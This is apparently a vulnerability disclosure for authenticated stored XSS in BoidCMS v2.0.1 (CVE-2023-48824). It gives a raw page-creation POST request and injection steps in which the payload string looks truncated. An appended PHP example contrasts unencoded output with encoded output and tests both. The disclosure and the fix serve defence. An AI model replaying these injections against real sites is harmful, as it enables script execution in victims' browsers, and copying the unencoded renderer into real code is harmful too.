# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS
# Date: 13/11/2023
# Exploit Author: BugsBD Limited
# Discovered by: Rahad Chowdhury
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip
# Version: v2.0.1
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48824

Description:

BoidCMS v2.0.1 is vulnerable to multiple authenticated stored cross-site scripting (XSS) vulnerabilities in the "title, subtitle, footer, keywords" parameters of the settings and create page forms.

Steps to Reproduce:

1. Request:

POST /BoidCMS/admin?page=create HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------9882691211259772119227456445
Content-Length: 1492
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/BoidCMS/admin?page=create
Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20; KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k; KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc
Upgrade-Insecure-Requests: 1

-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="type"

post
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="title"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="descr"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="keywords"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="content"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="permalink"


-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="tpl"

theme.php
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="thumb"


-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="date"

2023-12-02T19:41
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="pub"

true
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="token"

83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="create"

Create
-----------------------------9882691211259772119227456445--

2. Now use the XSS payload "> in the "title, subtitle, footer, keywords" parameters.

3. Save and check home.

## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)
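
Mitigation sketch for the four fields named in the description, as an added example that is not BoidCMS code or the author's: the unencoded renderer beside the encoded one, with a check that stored markup no longer reaches the page. The function names, the page layout and the assumption that all four fields are plain text are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not BoidCMS code: function names and page layout are hypothetical.

// Encode a stored value for HTML text and quoted-attribute contexts.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// "Before": stored values are concatenated into the page as-is.
function render_unencoded(array $s): string
{
    return "<title>{$s['title']}</title>\n"
        . "<meta name=\"keywords\" content=\"{$s['keywords']}\">\n"
        . "<h2>{$s['subtitle']}</h2>\n"
        . "<footer>{$s['footer']}</footer>\n";
}

// "After": every stored value is encoded at the point of output.
function render_encoded(array $s): string
{
    return '<title>' . e($s['title']) . "</title>\n"
        . '<meta name="keywords" content="' . e($s['keywords']) . "\">\n"
        . '<h2>' . e($s['subtitle']) . "</h2>\n"
        . '<footer>' . e($s['footer']) . "</footer>\n";
}

// True when the inert marker element survived into the output as live markup.
function leaks_markup(string $html): bool
{
    return str_contains($html, '<i>marker</i>');
}

// Constructed sample: an inert marker that closes a quoted attribute and opens a tag.
$marker = '"><i>marker</i>';
$stored = ['title' => $marker, 'subtitle' => $marker, 'footer' => $marker, 'keywords' => $marker];

if (!leaks_markup(render_unencoded($stored))) {
    throw new RuntimeException('expected the unencoded renderer to emit the marker as markup');
}
if (leaks_markup(render_encoded($stored))) {
    throw new RuntimeException('encoded renderer still emits stored markup');
}
echo render_encoded($stored);
```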